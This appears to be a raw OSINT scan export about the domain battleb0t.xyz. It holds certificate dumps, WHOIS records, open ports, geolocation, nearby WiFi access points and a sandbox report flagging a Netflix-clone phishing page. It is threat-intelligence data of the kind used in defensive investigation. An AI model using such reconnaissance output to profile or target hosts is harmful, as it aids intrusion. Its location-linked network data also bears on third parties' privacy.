ed:10:1d:cb:42:25:ea:6d:e6:42:50:4c:82:d7:21:
2e:ac:aa:6c:ee:6b:f7:e1:58:64:07:26:55:c1:2f:
e6:5e:f4:d7:f0:f0:f1:80:c4:a5:9f:c7:96:10:6f:
58:39:48:6a:55:ca:52:01:6a:3b:90:48:bc:27:e3:
bb:2e:83:ea:d3:dc:20:53:21:0d:af:34:82:fc:9f:
4c:d4:4a:b7:14:07:01:bb:2c:76:8e:22:ed:cd:33:
84:b4:42:01:5f:9f:c6:60:56:3d:e0:bb:bf:10:3f:
42:ca:65:31:ce:e9:5e:a4:e2:24:f7:ab:0e:d3:ce:
0e:6d:01:e6:42:c0:05:7f:8e:8b:85:68:57:f5:6c:
ca:7f:14:f3:74:ac:f1:ad:74:c5:8e:20:02:20:df:
19:4d:31:07:4a:75:45:cf:f0:a5:0c:ad:70:b3:f4:
12:1c:8b
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
CF:FE:0F:FB:EC:E3:E9:7B:CF:AB:EA:49:61:6D:B0:C0:A0:EB:11:BC
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:files.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
a4:32:cf:fb:d0:39:6f:82:9d:3d:67:37:3f:48:f2:83:df:47:
98:e5:77:f3:9a:cd:58:51:2e:5a:16:d2:ce:bc:15:65:21:f4:
b5:cd:b9:a9:fc:60:96:b4:37:b9:74:53:b0:08:d4:20:ed:ae:
46:30:5b:a1:40:1f:06:63:e8:b7:fd:a2:ae:46:43:12:c8:ec:
2c:fa:7e:4b:40:c3:e4:67:1b:d3:d7:35:70:63:9c:ea:59:e2:
5e:8f:9c:90:71:11:63:91:74:8d:0a:52:eb:ba:46:9f:f2:39:
5e:39:b2:09:76:41:0d:cb:d5:f3:3a:f2:81:99:14:13:be:9e:
11:ee:36:84:20:eb:dd:4f:6f:09:26:c0:62:74:10:aa:4d:74:
78:55:cd:0b:48:ce:19:77:6a:83:ea:d3:9f:49:7a:b9:c9:a9:
5b:95:9e:95:d8:54:4a:32:2e:c5:80:7d:32:ed:ad:ce:47:be:
97:bd:cb:d5:bd:1a:9f:ae:43:9a:14:6a:a0:5c:07:02:ab:55:
27:d1:6c:76:e5:b8:24:cd:b9:7c:e4:e2:4c:26:e7:40:31:8a:
19:ba:6f:75:c4:40:35:3a:93:76:52:b7:ca:0b:0f:f0:2a:8f:
ea:7f:1f:0f:0d:e6:80:25:29:5f:a8:34:cc:8b:fd:62:68:85:
22:2f:1a:a7
| battleb0t.xyz |
| 2023-05-12 02:54:18 | Linked URL - External | No | Web Spider | 8 | 0 | 3 | 0 | None | https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js | https://pics.battleb0t.xyz/ |
| 2023-05-12 03:33:14 | Physical Location | No | ipstack | 0 | 0 | 3 | 0 | None | Germany | 45.131.109.53 |
| 2023-05-12 03:32:13 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.7:8443 | 188.114.97.0/24 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ConnectionPoint (Net ID: 00:01:E3:4A:9F:48) | 52.3759, 4.8975 |
| 2023-05-12 02:54:56 | SSL Certificate - Raw Data | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:d7:56:4b:39:cd:63:5b:72:07:1e:ba:15:c9:f7:2c:e7:33
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Apr 24 04:50:12 2023 GMT
Not After : Jul 23 04:50:11 2023 GMT
Subject: CN=oldfluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:82:cb:77:ee:0a:02:15:cc:55:bf:00:98:6f:a8:
3f:b2:14:d4:9c:d2:64:fd:99:e1:d8:26:89:b8:f1:
dc:22:d0:26:9d:8e:a5:23:7c:46:6d:03:ff:6a:e6:
a2:08:ce:de:84:74:8f:ae:3e:dc:7e:26:40:72:7b:
57:ec:43:06:6a:71:6c:fc:31:f4:5e:75:d1:19:14:
5e:39:a9:c9:25:dc:c7:ab:fb:78:13:e9:b6:dd:4e:
22:f5:46:61:9b:4d:92:18:51:63:9f:47:d1:e0:56:
d2:dd:ee:e2:20:b3:7b:38:70:5e:c4:ce:34:85:6e:
20:54:d9:a0:fd:9c:5b:f3:2b:f0:71:40:e4:40:4b:
1e:0f:24:1b:6d:0c:b5:2f:db:ff:c9:99:df:c5:b7:
e3:7b:82:94:fd:3b:73:58:54:64:ee:2f:77:1b:b4:
c2:f6:38:26:30:8a:32:cc:d3:34:07:56:0c:a8:1d:
b3:55:51:77:90:73:0f:96:7f:80:56:ed:10:db:b0:
4f:75:85:22:ed:37:00:ed:d3:cd:b1:63:f5:f1:51:
be:1d:fc:12:12:48:53:55:50:e7:d9:8d:97:f2:49:
cd:d8:c7:68:76:42:1f:19:5e:47:61:6c:1c:99:ed:
d8:16:c4:32:36:77:d5:1b:79:9e:1e:4e:47:15:7c:
27:6f
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
18:EC:9F:C5:4F:26:93:D3:4A:02:0B:79:BA:BB:F3:33:18:F7:3E:35
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:oldfluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Apr 24 05:50:12.941 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:BE:39:54:A0:5F:1F:10:03:FA:09:8D:
D3:C7:7F:B5:EC:4B:30:F5:03:1A:D7:13:A5:C5:6A:89:
4C:4A:74:89:42:02:20:3C:6C:13:51:09:EB:20:0E:F2:
03:2C:A0:FE:54:7F:4D:57:F9:31:F5:F6:A8:0E:A0:F4:
B8:E3:3B:F1:51:CA:99
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Apr 24 05:50:12.949 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:96:8C:23:92:33:C0:50:69:A0:CE:CA:
6D:EC:41:72:0F:3A:22:55:7C:E8:C6:CE:65:0C:82:C6:
DB:89:9C:D5:92:02:20:1D:BC:82:99:B2:08:47:68:A7:
19:FE:0E:66:64:BD:7B:34:35:F5:43:E0:B0:AB:08:2C:
AC:E8:D7:78:E2:75:5B
Signature Algorithm: sha256WithRSAEncryption
75:8f:29:3b:d2:d8:ae:b2:42:be:ce:1d:92:6f:bf:ef:e4:4b:
a2:cc:9b:be:a2:6d:3e:79:03:58:39:62:e5:65:53:10:d9:48:
8b:b1:f6:05:b6:b7:52:53:28:4f:2a:d3:20:18:d0:2e:42:4c:
67:b2:a5:67:d1:32:90:9c:d4:e9:3e:c7:a3:6d:7e:19:cf:59:
bf:8e:eb:b2:ef:a8:35:56:cf:4d:12:32:f0:20:aa:e3:fa:5b:
67:0e:ad:7e:fd:aa:d9:0f:00:58:c4:8a:ff:28:e3:56:39:39:
d5:d5:6e:f4:82:09:ef:eb:ef:8d:10:bb:e4:fd:d3:df:7f:82:
4d:1e:9a:8e:07:b9:a2:ea:90:75:6d:88:35:45:32:5e:ef:d2:
88:82:4a:b0:57:e7:ca:c5:b0:4c:c5:d9:46:e9:84:e0:a2:96:
ca:c7:58:f8:26:23:6c:6a:c5:da:2f:19:ae:92:37:d6:01:ed:
da:39:aa:b3:fd:16:7a:3d:70:fe:30:a6:ba:a8:b4:33:13:8f:
50:9b:26:ec:34:68:cd:89:95:9d:6e:0f:b9:d7:5a:5c:dd:74:
3c:28:62:ab:d4:9a:31:85:d4:70:2a:24:9e:4b:82:ea:21:71:
d0:be:45:d1:a2:3f:85:e3:48:93:ac:6c:fe:38:a0:23:13:14:
9d:51:cb:62
| battleb0t.xyz |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/random_6.PNG | https://funny.battleb0t.xyz/ |
| 2023-05-12 02:58:35 | Phone Number | No | Phone Number Extractor | 0 | 0 | 2 | 0 | None | +74955801111 | Domain Name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.ru
Registrar URL: https://www.reg.ru/
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registry Expiry Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of Domain Names REG.RU, LLC
Registrar IANA ID: 1606
Domain Status: ok https://icann.org/epp#ok
Registrant Organization: Privacy Protection
Registrant State/Province:
Registrant Country: RU
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: DAPHNE.NS.CLOUDFLARE.COM
Name Server: SKIP.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:05.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.com
Registrar URL: https://www.reg.com
Registrar URL: https://www.reg.ru
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registrar Registration Expiration Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of domain names REG.RU LLC
Registrar IANA ID: 1606
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
Status: ok http://www.icann.org/epp#ok
Registrant ID: yhn6mof3dqy-sdhe
Registrant Name: Protection of Private Person
Registrant Street: PO box 87, REG.RU Protection Service
Registrant City: Moscow
Registrant State/Province:
Registrant Postal Code: 123007
Registrant Country: RU
Registrant Phone: +7.4955801111
Registrant Phone Ext:
Registrant Fax: +7.4955801111
Registrant Fax Ext:
Registrant Email: BATTLEB0T.XYZ@regprivate.ru
Admin ID: mhrgfickoq3r30s0
Admin Name: Protection of Private Person
Admin Street: PO box 87, REG.RU Protection Service
Admin City: Moscow
Admin State/Province:
Admin Postal Code: 123007
Admin Country: RU
Admin Phone: +7.4955801111
Admin Phone Ext:
Admin Fax: +7.4955801111
Admin Fax Ext:
Admin Email: BATTLEB0T.XYZ@regprivate.ru
Tech ID: yyj-fcbflruqmlro
Tech Name: Protection of Private Person
Tech Street: PO box 87, REG.RU Protection Service
Tech City: Moscow
Tech State/Province:
Tech Postal Code: 123007
Tech Country: RU
Tech Phone: +7.4955801111
Tech Phone Ext:
Tech Fax: +7.4955801111
Tech Fax Ext:
Tech Email: BATTLEB0T.XYZ@regprivate.ru
Name Server: daphne.ns.cloudflare.com
Name Server: skip.ns.cloudflare.com
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023.05.12T05:44:06Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
TERMS OF USE: The Whois and RDAP services are provided by REG.RU, and contain
information pertaining to Internet domain names registered by our
customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) Registrar of Domain Names REG.RU LLC (https://www.reg.com)
|
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Woonkamer extra (Net ID: 00:0C:F6:5C:D4:54) | 50.8897, 6.0563 |
| 2023-05-12 02:50:59 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://asbrii.github.io/Netflixclone', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://asbrii.github.io/netflixclone', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://asbrii.github.io/Netflixclone/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_c6c_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_c6c_ConnHashTable<3180>_HashTable_Mutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_c6c_IESQMMUTEX_0_519"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_c6c_IE_EarlyTabStart_0xd60_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_c6c_IESQMMUTEX_0_303"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "UpdatingNewTabPageData"\n "IsoScope_c6c_IESQMMUTEX_0_331"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3180"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"asbrii.github.io"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"1_2_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3" and extension "jpg"\n "2_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced" and extension "png"\n "4_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced" and extension "png"\n "3_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 640x480 components 3" and extension "jpg"\n "tv_1_.png" has type "PNG image data 640 x 480 8-bit colormap non-interlaced" and extension "png"\n "logo_1_.png" has type "PNG image data 329 x 88 8-bit/color RGBA non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "1_2_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3"- [targetUID: N/A]\n "2_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "4_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "3_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 640x480 components 3"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003180]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF251D14D70A3CF7CA.TMP" has type "data"- Location: [%TEMP%\\~DF251D14D70A3CF7CA.TMP]- [targetUID: 00000000-00003180]\n "~DF182BBFB15AE7FA7B.TMP" has type "data"- Location: [%TEMP%\\~DF182BBFB15AE7FA7B.TMP]- [targetUID: 00000000-00003180]\n "~DFFF3ED2155B95DC4E.TMP" has type "data"- Location: [%TEMP%\\~DFFF3ED2155B95DC4E.TMP]- [targetUID: 00000000-00003180]\n "~DF695BC770569E5886.TMP" has type "data"- Location: [%TEMP%\\~DF695BC770569E5886.TMP]- [targetUID: 00000000-00003180]\n "tv_1_.png" has type "PNG image data 640 x 480 8-bit colormap non-interlaced"- [targetUID: N/A]\n "logo_1_.png" has type "PNG image data 329 x 88 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "gc_1_.css" has type "ASCII text"- [targetUID: N/A]\n "RecoveryStore._6181050B-EF98-11ED-B78E-080027114090_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_6181050D-EF98-11ED-B78E-080027114090_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_683852A4-EF98-11ED-B78E-080027114090_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "urlref_httpsasbrii.github.ioNetflixclone" has type "HTML document UTF-8 Unicode text"- [targetUID: N/A]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "WMG50FG8.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\WMG50FG8.txt]- [targetUID: 00000000-00003180]\n "7VVH3I4B.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\7VVH3I4B.txt]- [targetUID: 00000000-00003180]\n "7OKH26QO.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\7OKH26QO.txt]- [targetUID: 00000000-00003180]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "C2QFW8PG.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\C2QFW8PG.txt]- [targetUID: 00000000-00003180]\n "0JWEZKR8.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\0JWEZKR8.txt]- [targetUID: 00000000-00003180]\n "RP5TI3KC.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\RP5TI3KC.txt]- [targetUID: 00000000-00003180]\n "S0QLJ7QP.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\S0QLJ7QP.txt]- [targetUID: 00000000-00003180]\n "Netflixclone_1_.htm" has type "HTML document UTF-8 Unicode text"- [targetUID: N/A]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://asbrii.github.io/Netflixclone/"\n Pattern match: "https://asbrii.github.io"\n Pattern match: "https://asbrii.github.io/Netflixclone"\n Pattern match: "OqC.jAG/4W^Ah\'AtW5"\n Pattern match: "SUIDmicrosoft.com/9216277184358431032346166895971631032229MUID1037C11BAE9D67762C40D215AFD1661Bmicrosoft.com/1025290433280031110700166895971631032229_EDGE_Vmicrosoft.com/9216290433280031110700166911596631032229SRCHDAF=NOFORMmicrosoft.com/1024332378944031085"\n Pattern match: "SUIDmicrosoft.com/9216277184358431032346166895971631032229MUID1037C11BAE9D67762C40D215AFD1661Bmicrosoft.com/1025290433280031110700166895971631032229SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743SRCHUIDV=2&GUID=426377958C8445E3B4EA69482"\n Pattern match: "SUIDmicrosoft.com/9216277184358431032346166895971631032229SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD0E747&dmnchg=1microsoft.com/102433237894403108561027971357230938743SRCHUSRDOB=20220131mi"\n Pattern match: "9216290433280031110700167224096631032229MUID07FB17B7DC71633514C204B9DD3D6245msn.com/1025290433280031110700167224096631032229"\n Pattern match: "MUIDB1037C11BAE9D67762C40D215AFD1661Bieonline.microsoft.com/9216290433280031110700166895971631032229"\n Pattern match: "isdomainmigratedtruewww.msn.com/1025379775232031068455167224096631032229"\n Pattern match: "SUIDMmicrosoft.com/9216277184358431032346166895971631032229*SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743*SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD0E747&dmnchg=1microsoft.com/102433237894403108561027971357230938743*SRCHUSRDOB=202201"\n Pattern match: "SUIDMmicrosoft.com/9216277184358431032346166895971631032229*MUID1037C11BAE9D67762C40D215AFD1661Bmicrosoft.com/1025290433280031110700166895971631032229*_EDGE_V1microsoft.com/9216290433280031110700166911596631032229*SRCHDAF=NOFORMmicrosoft.com/10243323789440"\n Pattern match: "isdomainmigratedtruewww.msn.com/102537977523203106845516722409663103 | 185.199.108.153 |
| 2023-05-12 03:01:33 | Raw Data from RIRs | No | Tool - WhatWeb | 1 | 0 | 2 | 0 | None | [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://www.ayhu.xyz', u'http_status': 301, u'plugins': {u'Country': {u'string': [u'UNITED STATES'], u'module': [u'US']}, u'HTTPServer': {u'string': [u'cloudflare']}, u'RedirectLocation': {u'string': [u'https://www.ayhu.xyz/']}, u'UncommonHeaders': {u'string': [u'report-to,nel,cf-ray,alt-svc']}, u'IP': {u'string': [u'104.21.6.166']}}}, {}] | www.ayhu.xyz |
| 2023-05-12 03:31:32 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 6 | 0 | None | b7a6addeb33844c5b2bc9f82a64406e6.protect@withheldforprivacy.com | Domain Name: ECASH-PAY.COM
Registry Domain ID: 2607738264_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2023-03-27T06:28:15Z
Creation Date: 2021-04-26T06:58:38Z
Registry Expiry Date: 2024-04-26T06:58:38Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.6613102107
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: DNS1.REGISTRAR-SERVERS.COM
Name Server: DNS2.REGISTRAR-SERVERS.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain name: ecash-pay.com
Registry Domain ID: 2607738264_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2023-03-27T06:28:15.08Z
Creation Date: 2021-04-26T06:58:38.00Z
Registrar Registration Expiration Date: 2024-04-26T06:58:38.00Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: b7a6addeb33844c5b2bc9f82a64406e6.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: b7a6addeb33844c5b2bc9f82a64406e6.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
